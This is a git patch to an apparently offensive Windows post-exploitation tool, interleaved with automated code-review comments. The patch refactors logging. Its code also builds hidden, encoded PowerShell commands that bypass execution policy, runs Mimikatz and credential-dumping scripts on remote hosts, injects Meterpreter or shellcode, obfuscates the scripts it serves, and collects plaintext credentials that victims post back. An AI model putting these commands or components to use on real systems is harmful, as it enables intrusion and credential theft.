From 3aaa378a235dc7ffecb00e7ca1b6e0c5bde17e93 Mon Sep 17 00:00:00 2001
From: byt3bl33d3r
Date: Sun, 17 Jan 2016 00:09:45 -0700
Subject: [PATCH] - HTTP/S server now uses the new logging system
---
 core/greenlets.py | 72 +++++++++++++++++++++++++++++++++++-----
 core/powershell.py | 2 +-
 core/servers/mimikatz.py | 37 ++++++++++++---------
 3 files changed, 86 insertions(+), 25 deletions(-)
diff --git a/core/greenlets.py b/core/greenlets.py
index 09ad305e..2ef16920 100644
--- a/core/greenlets.py
+++ b/core/greenlets.py
@@ -231,39 +231,93 @@ def main_greenlet(host):
 service_control.run(host)
 if settings.args.command:
- EXECUTOR(cme_logger, settings.args.command, host, domain, settings.args.no_output, smb, settings.args.execm)
+ EXECUTOR(cme_logger,
+ settings.args.command,
+ host,
+ domain,
+ settings.args.no_output,
+ smb,
+ settings.args.execm)
 if settings.args.pscommand:
- EXECUTOR(cme_logger, ps_command(settings.args.pscommand), host, domain, settings.args.no_output, smb, settings.args.execm)
+ EXECUTOR(cme_logger,
+ ps_command(settings.args.pscommand, settings.args.ps_arch),
+ host,
+ domain,
+ settings.args.no_output,
+ smb,
+ settings.args.execm)
 if settings.args.mimikatz:
 powah_command = PowerShell(settings.args.server, local_ip)
- EXECUTOR(cme_logger, powah_command.mimikatz(), host, domain, True, smb, settings.args.execm)
+ EXECUTOR(cme_logger,
+ powah_command.mimikatz(),
+ host,
+ domain,
+ True,
+ smb,
+ settings.args.execm)
 if settings.args.gpp_passwords:
 powah_command = PowerShell(settings.args.server, local_ip)
- EXECUTOR(cme_logger, powah_command.gpp_passwords(), host, domain, True, smb, settings.args.execm)
+ EXECUTOR(cme_logger,
+ powah_command.gpp_passwords(),
+ host,
+ domain,
+ True,
+ smb,
+ settings.args.execm)
 if settings.args.mimikatz_cmd:
 powah_command = PowerShell(settings.args.server, local_ip)
- EXECUTOR(cme_logger, powah_command.mimikatz(settings.args.mimikatz_cmd), host, domain, True, smb, settings.args.execm)
+ EXECUTOR(cme_logger,
+ powah_command.mimikatz(settings.args.mimikatz_cmd),
+ host,
+ domain,
+ True,
+ smb,
+ settings.args.execm)
 if settings.args.powerview:
 #For some reason powerview functions only seem to work when using smbexec...
 #I think we might have a mistery on our hands boys and girls!
 powah_command = PowerShell(settings.args.server, local_ip)
- EXECUTOR(cme_logger, powah_command.powerview(settings.args.powerview), host, domain, True, smb, 'smbexec')
+ EXECUTOR(cme_logger,
+ powah_command.powerview(settings.args.powerview),
+ host,
+ domain,
+ True,
+ smb,
+ 'smbexec')
 if settings.args.inject:
 powah_command = PowerShell(settings.args.server, local_ip)
 if settings.args.inject.startswith('met_'):
- EXECUTOR(cme_logger, powah_command.inject_meterpreter(), host, domain, True, smb, settings.args.execm)
+ EXECUTOR(cme_logger,
+ powah_command.inject_meterpreter(),
+ host,
+ domain,
+ True,
+ smb,
+ settings.args.execm)
 if settings.args.inject == 'shellcode':
- EXECUTOR(cme_logger, powah_command.inject_shellcode(), host, domain, True, smb, settings.args.execm)
+ EXECUTOR(cme_logger,
+ powah_command.inject_shellcode(),
+ host,
+ domain,
+ True,
+ smb,
+ settings.args.execm)
 if settings.args.inject == 'dll' or settings.args.inject == 'exe':
- EXECUTOR(cme_logger, powah_command.inject_exe_dll(), host, domain, True, smb, settings.args.execm)
+ EXECUTOR(cme_logger,
+ powah_command.inject_exe_dll(),
+ host,
+ domain,
+ True,
+ smb,
+ settings.args.execm)
 try:
 smb.logoff()
 except:
diff --git a/core/powershell.py b/core/powershell.py
index 822493c4..f4a232d4 100644
--- a/core/powershell.py
+++ b/core/powershell.py
@@ -13,7 +13,7 @@ def ps_command(command, arch):
 logging.info('Forcing the following command to execute in a 32bit PS process: ' + command)
 command = '%SystemRoot%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(command.encode('UTF-16LE')))
- elif arch == 64:
+ elif arch == 64 or arch == 'auto':
 command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(command.encode('UTF-16LE')))
 logging.info('Full PS command: ' + command)
diff --git a/core/servers/mimikatz.py b/core/servers/mimikatz.py
index fe94a9cb..95e18ccc 100644
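Review bot: The nine reflowed EXECUTOR calls in main_greenlet differ only in their command argument and the no_output flag, so the new layout repeats the same seven-line call shape nine times; a small local helper taking the command, the no_output flag and the exec method, closing over cme_logger, host, domain and smb, would leave one line per branch. The single functional change in the hunk, `ps_command(settings.args.pscommand, settings.args.ps_arch)`, is easy to miss inside the reflow and would be clearer as its own commit. The powerview branch keeps the hard-coded `'smbexec'` while every other branch passes `settings.args.execm`; the two-line comment above it gives the reason, but a short note on the call itself would keep the exception visible once the comment scrolls away. main_greenlet starts before and ends after the hunk.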
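Review bot: With the new condition `elif arch == 64 or arch == 'auto':`, any other value of arch (for example the string '64', if ps_arch reaches here unconverted from the command line, which this diff does not show) matches neither branch, so `command` continues as the raw, unwrapped string and the following `logging.info('Full PS command: ' + command)` reports it as if it were the final command. An explicit terminal branch would make that failure visible instead of silent: `else:` / `raise ValueError('unsupported PowerShell arch: {!r}'.format(arch))`. ps_command starts before the hunk and continues past the logging call outside it.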
--- a/core/servers/mimikatz.py
+++ b/core/servers/mimikatz.py
@@ -1,8 +1,9 @@
 from BaseHTTPServer import BaseHTTPRequestHandler
 from threading import Thread
-from core.logger import *
 from datetime import datetime
 from StringIO import StringIO
+from core.logger import CMEAdapter
+import logging
 import core.settings as settings
 import os
 import re
@@ -16,13 +17,14 @@ synopsis = re.compile('<#.+#>')
 class MimikatzServer(BaseHTTPRequestHandler):
 def log_message(self, format, *args):
- print_message("%s - - %s" % (self.client_address[0], format%args))
+ cme_logger = logging.getLogger('CME')
+ cme_logger.info("%s - - %s" % (self.client_address[0], format%args))
- def save_mimikatz_output(self, data):
+ def save_mimikatz_output(self, data, cme_logger):
 log_name = 'Mimikatz-{}-{}.log'.format(self.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
 with open('logs/' + log_name, 'w') as creds:
 creds.write(data)
- print_status("{} Saved POST data to {}".format(self.client_address[0], yellow(log_name)))
+ cme_logger.info("Saved Mimikatz's output to {}".format(log_name))
 def do_GET(self):
 if self.path[1:].endswith('.ps1') and self.path[1:] in os.listdir('hosted'):
@@ -33,7 +35,7 @@ class MimikatzServer(BaseHTTPRequestHandler):
 if self.path[1:] != 'powerview.ps1':
 logging.info('Obfuscating Powershell script')
 ps_script = eval(synopsis.sub('', repr(ps_script))) #Removes the synopsys
- ps_script = func_name.sub(settings.args.obfs_func_name, ps_script) #Randomizes the function name
+ ps_script = func_name.sub(settings.obfs_func_name, ps_script) #Randomizes the function name
 ps_script = comments.sub('', ps_script) #Removes the comments
 #logging.info('Sending the following modified powershell script: {}'.format(ps_script))
 self.wfile.write(ps_script)
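Review bot: `def save_mimikatz_output(self, data, cme_logger):` now requires a logger, but the mimikatz_cmd branch in the later `@@ -70,30 +77,30 @@` hunk still calls `self.save_mimikatz_output(data)` with one argument, so that path raises TypeError on every POST and nothing is written; change that call to `self.save_mimikatz_output(data, cme_logger)` as the mimikatz branch does, or give the parameter a default of `None` and fall back to `logging.getLogger('CME')` inside the method. The method also deserves a short docstring stating that it writes the raw POST body to `logs/Mimikatz-<client_ip>-<timestamp>.log` and logs only the file name, since the old message reported the path and the new one does not. Both method bodies are complete here, but the class continues outside the hunk.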
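Review bot: The change from `settings.args.obfs_func_name` to `settings.obfs_func_name` moves the function name from the parsed arguments to a module-level attribute of core.settings, and nothing in this diff shows that attribute being defined; if it is not set before the first script request arrives, do_GET fails with AttributeError rather than serving the file, so the definition is worth confirming. The `eval(synopsis.sub('', repr(ps_script)))` on the line above is left as is; compiling the synopsis pattern with `re.DOTALL` and a non-greedy `<#.+?#>` would let `synopsis.sub('', ps_script)` remove the block directly, without round-tripping the file contents through eval. do_GET starts before the hunk.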
@@ -55,6 +57,11 @@ class MimikatzServer(BaseHTTPRequestHandler):
 length = int(self.headers.getheader('content-length'))
 data = self.rfile.read(length)
+ cme_logger = CMEAdapter(logging.getLogger('CME'), {'host': self.client_address[0],
+ 'port': self.client_address[1],
+ 'service': 'PARSER',
+ 'hostname': ''})
+
 if settings.args.mimikatz:
 try:
 buf = StringIO(data).readlines()
@@ -70,30 +77,30 @@ class MimikatzServer(BaseHTTPRequestHandler):
 i += 1
 if plaintext_creds:
- print_succ('{} Found plain text credentials (domain\\user:password):'.format(self.client_address[0]))
+ cme_logger.success('Found plain text credentials (domain\\user:password)')
 for cred in plaintext_creds:
- print_att(u'{}'.format(cred))
+ cme_logger.results(u'{}'.format(cred))
 except Exception as e:
- print_error("Error while parsing Mimikatz output: {}".format(e))
+ cme_logger.error("Error while parsing Mimikatz output: {}".format(e))
- self.save_mimikatz_output(data)
+ self.save_mimikatz_output(data, cme_logger)
 elif settings.args.mimikatz_cmd:
- print_succ('{} Mimikatz command output:'.format(self.client_address[0]))
- print_att(data)
+ cme_logger.success('Got Mimikatz command output')
+ cme_logger.results(data)
 self.save_mimikatz_output(data)
 elif settings.args.powerview and data:
- print_succ('{} PowerView command output:'.format(self.client_address[0]))
+ cme_logger.success('Got PowerView command output')
 buf = StringIO(data.strip()).readlines()
 for line in buf:
- print_att(line.strip())
+ cme_logger.results(line.strip())
 elif settings.args.gpp_passwords and data:
- print_succ('{} Get-GPPPasswords output:'.format(self.client_address[0]))
+ cme_logger.success('Got Get-GPPPasswords output')
 buf = StringIO(data.strip()).readlines()
 for line in buf:
- print_att(line.strip())
+ cme_logger.results(line.strip())
 def http_server(port):
 http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer)
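Review bot: The new CMEAdapter is created right after `data = self.rfile.read(length)`, but nothing in this handler validates `length` first: `self.headers.getheader('content-length')` returns None when the header is missing, so `int(None)` raises TypeError before the logger exists, and an arbitrarily large value is read into memory in a single call. Guarding the conversion, for example `length = int(self.headers.getheader('content-length') or 0)` together with an upper bound on what the parser accepts, would turn a malformed request into a logged error instead of a traceback in the request thread. The fixed `'hostname': ''` in the adapter context leaves the hostname column of every parsed-output line empty; if that is intended because the server only knows the peer address, a one-line comment saying so would help. The enclosing method starts before the hunk and its name is not visible here.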
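Review bot: Style: the powerview and gpp_passwords branches still go through `StringIO(data.strip()).readlines()` only to strip each line again; `for line in data.strip().splitlines():` reads the same and drops the StringIO round trip, and `cme_logger.results(u'{}'.format(cred))` can be `cme_logger.results(cred)` unless the unicode coercion is deliberate. PowerView and Get-GPPPasswords output is only logged and never passed to save_mimikatz_output the way the two mimikatz branches are, so it survives only in the console log; a comment stating that this is intentional, or a call to the helper, would settle it. The surrounding method and class continue outside the hunk.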